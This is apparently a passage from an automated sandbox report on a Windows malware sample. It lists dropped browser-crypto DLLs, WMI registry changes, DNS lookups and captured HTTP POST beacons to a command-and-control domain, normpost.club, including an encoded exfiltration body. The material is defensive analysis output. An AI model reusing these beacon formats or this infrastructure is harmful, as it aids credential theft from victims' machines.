  653. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
  654. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
  655. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
  656. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
  657. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
  658. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
  659. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
  660. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
  661. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
  662. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\",
  663. "C:\\Users\\user\\AppData\\Local\\Temp\\81cbcc404e61f34b1e403ab322281c04e7c4bed3964223f7851a147321a60949.exe"
  664.  
  665.  
  666. * Modified Registry Keys:
  667. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wmiApSrv\\Type",
  668. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  669. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refreshed",
  670. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
  671. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
  672. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
  673. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
  674. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
  675. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
  676. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
  677. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
  678. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
  679. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
  680. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider",
  681. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\IDE\\DiskVBOX_HARDDISK___________________________1.0_____\\5&33d1638a&0&0.0.0_0-00000000-0000-0000-0000-000000000000",
  682. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\advapi32.dllMofResourceName",
  683. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\en-US\\advapi32.dll.muiMofResourceName",
  684. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ACPI.sysACPIMOFResource",
  685. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ACPI.sys.muiACPIMOFResource",
  686. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ndis.sysMofResourceName",
  687. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ndis.sys.muiMofResourceName",
  688. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\mssmbios.sysMofResource",
  689. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\mssmbios.sys.muiMofResource",
  690. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\HDAudBus.sysHDAudioMofName",
  691. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\HDAudBus.sys.muiHDAudioMofName",
  692. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\intelppm.sysPROCESSORWMI",
  693. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\intelppm.sys.muiPROCESSORWMI",
  694. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\portcls.SYSPortclsMof",
  695. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\en-US\\portcls.SYS.muiPortclsMof",
  696. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sysMonitorWMI"
  697.  
  698.  
  699. * Deleted Registry Keys:
  700. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sysMonitorWMI"
  701.  
  702.  
  703. * DNS Communications:
  704.  
  705. "type": "A",
  706. "request": "normpost.club",
  707. "answers":
  708.  
  709. "data": "2.56.215.234",
  710. "type": "A"
  711.  
  712.  
  713.  
  714.  
  715. "type": "A",
  716. "request": "ip-api.com",
  717. "answers":
  718.  
  719. "data": "72.11.140.50",
  720. "type": "A"
  721.  
  722.  
  723. "data": "66.212.29.250",
  724. "type": "A"
  725.  
  726.  
  727.  
  728.  
  729.  
  730. * Domains:
  731.  
  732. "ip": "2.56.215.234",
  733. "domain": "normpost.club"
  734.  
  735.  
  736. "ip": "66.212.29.250",
  737. "domain": "ip-api.com"
  738.  
  739.  
  740.  
  741. * Network Communication - ICMP:
  742.  
  743. * Network Communication - HTTP:
  744.  
  745. "count": 1,
  746. "body": "\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
  747. "uri": "http://normpost.club/index.php",
  748. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  749. "method": "POST",
  750. "host": "normpost.club",
  751. "version": "1.1",
  752. "path": "/index.php",
  753. "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: normpost.club\r\nContent-Length: 107\r\nCache-Control: no-cache\r\n\r\n\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
  754. "port": 80
  755.  
  756.  
  757. "count": 1,
  758. "body": "",
  759. "uri": "http://ip-api.com/json",
  760. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  761. "method": "GET",
  762. "host": "ip-api.com",
  763. "version": "1.1",
  764. "path": "/json",
  765. "data": "GET /json HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: ip-api.com\r\nCache-Control: no-cache\r\n\r\n",
  766. "port": 80
  767.  
  768.  
  769. "count": 1,
  770. "body": "",
  771. "uri": "http://normpost.club/index.php",
  772. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  773. "method": "POST",
  774. "host": "normpost.club",
  775. "version": "1.1",
  776. "path": "/index.php",
  777. "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: normpost.club\r\nContent-Length: 9721\r\nCache-Control: no-cache\r\n\r\n",
  778. "port": 80
  779.  
  780.  
  781.  
  782. * Network Communication - SMTP:
  783.  
  784. * Network Communication - Hosts:
  785.  
  786. * Network Communication - IRC: